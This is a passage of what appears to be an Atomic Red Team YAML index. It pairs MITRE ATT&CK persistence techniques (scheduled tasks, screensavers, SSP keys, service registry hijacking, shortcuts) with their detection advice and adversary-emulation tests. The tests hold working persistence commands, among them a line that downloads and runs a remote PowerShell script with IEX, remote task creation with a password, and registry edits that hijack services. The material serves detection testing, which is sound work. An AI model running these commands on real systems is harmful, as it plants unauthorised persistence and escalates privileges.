and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1053.005 + atomic_tests: + - name: Scheduled Task Startup Script + auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 + description: | + Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view + the tasks, open the Task Scheduler and look in the Active Tasks pane. + supported_platforms: + - windows + executor: + command: | + schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" + schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" + cleanup_command: | + schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 + schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 + name: command_prompt + elevation_required: true + - name: Scheduled task Local + auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 + description: 'Upon successful execution, cmd.exe will create a scheduled task + to spawn cmd.exe at 20:10. + +' + supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + executor: + name: command_prompt + elevation_required: false + command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 + +' + - name: Scheduled task Remote + auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + description: | + Create a task on a remote system. + + Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + target: + description: Target + type: String + default: localhost + user_name: + description: 'Username to authenticate with, format: DOMAIN\User' + type: String + default: DOMAIN\user + password: + description: Password to authenticate with + type: String + default: At0micStrong + executor: + name: command_prompt + elevation_required: true + command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN + "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} + /TN "Atomic task" /F >nul 2>&1 + +' + - name: Powershell Cmdlet Scheduled Task + auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + description: | + Create an atomic scheduled task that leverages native powershell cmdlets. + + Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + $Action = New-ScheduledTaskAction -Execute "calc.exe" + $Trigger = New-ScheduledTaskTrigger -AtLogon + $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest + $Set = New-ScheduledTaskSettingsSet + $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set + Register-ScheduledTask AtomicTask -InputObject $object + cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false + >$null 2>&1 + +' + - name: Task Scheduler via VBA + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" + name: powershell + - name: WMI Invoke-CimMethod Scheduled Task + auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + description: 'Create an scheduled task that executes notepad.exe after user + login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing + as Register-ScheduledTask cmdlet behind the scenes. + +' + supported_platforms: + - windows + executor: + name: powershell + elevation_required: true + command: | + $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") + Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } + cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false + >$null 2>&1 + +' + T1053: + technique: + id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task/Job + description: |- + Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) + + Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). + external_references: + - source_name: mitre-attack + external_id: T1053 + url: https://attack.mitre.org/techniques/T1053 + - external_id: CAPEC-557 + source_name: capec + url: https://capec.mitre.org/data/definitions/557.html + - url: https://technet.microsoft.com/en-us/library/cc785125.aspx + description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved + June 8, 2016. + source_name: TechNet Task Scheduler Security + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-20T16:31:11.405Z' + created: '2017-05-31T21:30:46.977Z' + x_mitre_platforms: + - Windows + - Linux + - macOS + - Containers + x_mitre_remote_support: true + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." + x_mitre_data_sources: + - 'File: File Creation' + - 'Container: Container Creation' + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Prashant Verma, Paladion + - Leo Loobeek, @leoloobeek + - Travis Smith, Tripwire + - Alain Homewood, Insomnia Security + x_mitre_version: '2.1' + x_mitre_is_subtechnique: false + atomic_tests: [] + T1546.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.002 + url: https://attack.mitre.org/techniques/T1546/002 + - source_name: Wikipedia Screensaver + description: Wikipedia. (2017, November 22). Screensaver. Retrieved December + 5, 2017. + url: https://en.wikipedia.org/wiki/Screensaver + - source_name: ESET Gazer Aug 2017 + description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage + backdoor. Retrieved September 14, 2017.' + url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Screensaver + description: |- + Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. + + The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: + + * SCRNSAVE.exe - set to malicious PE path + * ScreenSaveActive - set to '1' to enable the screensaver + * ScreenSaverIsSecure - set to '0' to not require a password to unlock + * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed + + Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) + id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-23T12:23:04.955Z' + created: '2020-01-24T13:51:01.210Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. + + Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Bartosz Jerzman + x_mitre_platforms: + - Windows + identifier: T1546.002 + atomic_tests: + - name: Set Arbitrary Binary as Screensaver + auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 + description: 'This test copies a binary into the Windows System32 folder and + sets it as the screensaver so it will execute for persistence. Requires a + reboot and logon. + +' + supported_platforms: + - windows + input_arguments: + input_binary: + description: Executable binary to use in place of screensaver for persistence + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f + shutdown /r /t 0 + name: command_prompt + elevation_required: true + T1547.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.005 + url: https://attack.mitre.org/techniques/T1547/005 + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. + source_name: Microsoft Configure LSA + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Security Support Provider + description: |- + Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. + + The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) + id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:42:48.910Z' + created: '2020-01-24T17:16:11.806Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned SSP DLLs try to load into the LSA by + setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + identifier: T1547.005 + atomic_tests: + - name: Modify SSP configuration in registry + auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e + description: Add a value to a Windows registry SSP key, simulating an adversarial + modification of those keys. + supported_platforms: + - windows + input_arguments: + fake_ssp_dll: + description: Value added to registry key. Normally refers to a DLL name + in C:\Windows\System32. + type: String + default: not-a-ssp + executor: + command: | + # run these in sequence + $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' + $SecurityPackagesUpdated = $SecurityPackages + $SecurityPackagesUpdated += "#{fake_ssp_dll}" + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated + + # revert (before reboot) + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages + name: powershell + elevation_required: true + T1505: + technique: + id: attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb + description: Adversaries may abuse legitimate extensible development features + of servers to establish persistent access to systems. Enterprise server applications + may include features that allow developers to write and install software or + scripts to extend the functionality of the main application. Adversaries may + install malicious components to extend and abuse server applications. + name: Server Software Component + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1505 + url: https://attack.mitre.org/techniques/T1505 + - url: https://www.us-cert.gov/ncas/alerts/TA15-314A + description: US-CERT. (2015, November 13). Compromised Web Servers and Web + Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. + source_name: US-CERT Alert TA15-314A Web Shells + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-09-16T19:34:19.961Z' + created: '2019-06-28T17:52:07.296Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + - Linux + - macOS + x_mitre_permissions_required: + - Administrator + - SYSTEM + - root + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' + - 'Application Log: Application Log Content' + x_mitre_detection: "Consider monitoring application logs for abnormal behavior + that may indicate suspicious installation of application software components. + Consider monitoring file locations associated with the installation of new + application software components such as paths from which applications typically + load such extensible components.\n\nProcess monitoring may be used to detect + servers components that perform suspicious actions such as running cmd.exe + or accessing files. Log authentication attempts to the server and any unusual + traffic patterns to or from the server and internal network. (Citation: US-CERT + Alert TA15-314A Web Shells) " + atomic_tests: [] + T1574.010: + technique: + created: '2020-03-12T20:43:53.998Z' + modified: '2020-09-16T19:10:04.262Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + name: Services File Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.010 + url: https://attack.mitre.org/techniques/T1574/010 + - external_id: CAPEC-17 + source_name: capec + url: https://capec.mitre.org/data/definitions/17.html + x_mitre_platforms: + - Windows + x_mitre_detection: "Look for changes to binaries and service executables that + may normally occur during software updates. If an executable is written, renamed, + and/or moved to match an existing service executable, it could be detected + and correlated with other suspicious behavior. Hashing of binaries and service + executables could be used to detect replacement against historical data.\n\nLook + for abnormal process call trees from typical processes and services and for + execution of other commands that could relate to Discovery or other adversary + techniques. " + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + atomic_tests: [] + T1574.011: + technique: + created: '2020-03-13T11:42:14.444Z' + modified: '2020-09-16T19:07:48.590Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c + description: "Adversaries may execute their own malicious payloads by hijacking + the Registry entries used by services. Adversaries may use flaws in the permissions + for registry to redirect from the originally specified executable to one that + they control, in order to launch their own code at Service start. Windows + stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. + The information stored under a service's Registry keys can be manipulated + to modify a service's execution parameters through tools such as the service + controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), + or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys + is controlled through Access Control Lists and permissions. (Citation: Registry + Key Security)\n\nIf the permissions for users and groups are not properly + set and allow access to the Registry keys for a service, then adversaries + can change the service binPath/ImagePath to point to a different executable + under their control. When the service starts or is restarted, then the adversary-controlled + program will execute, allowing the adversary to gain persistence and/or privilege + escalation to the account context the service is set to execute under (local/domain + account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also + alter Registry keys associated with service failure parameters (such as FailureCommand) + that may be executed in an elevated context anytime the service fails or is + intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: + Tweet Registry Perms Weakness) " + name: Services Registry Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.011 + url: https://attack.mitre.org/techniques/T1574/011 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - source_name: Registry Key Security + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. + Retrieved March 16, 2017. + - source_name: Kansa Service related collectors + url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html + description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and + analysis. Retrieved October 10, 2019.' + - source_name: Tweet Registry Perms Weakness + url: https://twitter.com/r0wdy_/status/936365549553991680 + description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved + April 9, 2018." + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' + x_mitre_detection: |- + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. + + Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Application control + identifier: T1574.011 + atomic_tests: + - name: Service Registry Permissions Weakness + auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service check + type: String + default: weakservicename + executor: + command: | + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL + name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt + T1547.009: + technique: + id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 + description: |- + Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. + + Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. + name: Shortcut Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.009 + url: https://attack.mitre.org/techniques/T1547/009 + - external_id: CAPEC-132 + source_name: capec + url: https://capec.mitre.org/data/definitions/132.html + - source_name: BSidesSLC 2020 - LNK Elastic + url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ + description: French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger + Than Its Weakest LNK. Retrieved November 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-13T21:30:24.555Z' + created: '2020-01-24T19:00:32.917Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - David French, Elastic + - Bobby, Filar, Elastic + - Travis Smith, Tripwire + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections. + + Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic) + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.009 + atomic_tests: + - name: Shortcut Modification + auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce + description: | + This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; + gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. + Upon execution, calc.exe will be launched. + supported_platforms: + - windows + input_arguments: + shortcut_file_path: + description: shortcut modified and execute + type: path + default: "%temp%\\T1547.009_modified_shortcut.url" + executor: + command: | + echo [InternetShortcut] > #{shortcut_file_path} + echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} + #{shortcut_file_path} + cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 + +' + name: command_prompt + - name: Create shortcut to cmd in startup folders + auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 + description: | + LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" + to view the new shortcut. + supported_platforms: + - windows + executor: + command: | + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1037.005: + technique: + id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f + description: "Adversaries may use startup items automatically executed at boot + initialization to establish persistence. Startup items execute during the + final phase of the boot process and contain shell scripts or other executable + files along with configuration information used by the system to determine + the execution order for all startup items. (Citation: Startup Items)\n\nThis + is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), + and thus the appropriate folder, /Library/StartupItems isn’t + guaranteed to exist on the system by default, but does appear to exist by + default on macOS Sierra. A startup item is a directory whose executable and + configuration property list (plist), StartupParameters.plist, + reside in the top-level directory. \n\nAn adversary can create the appropriate + folders/files in the StartupItems directory to register their own persistence + mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since + StartupItems run 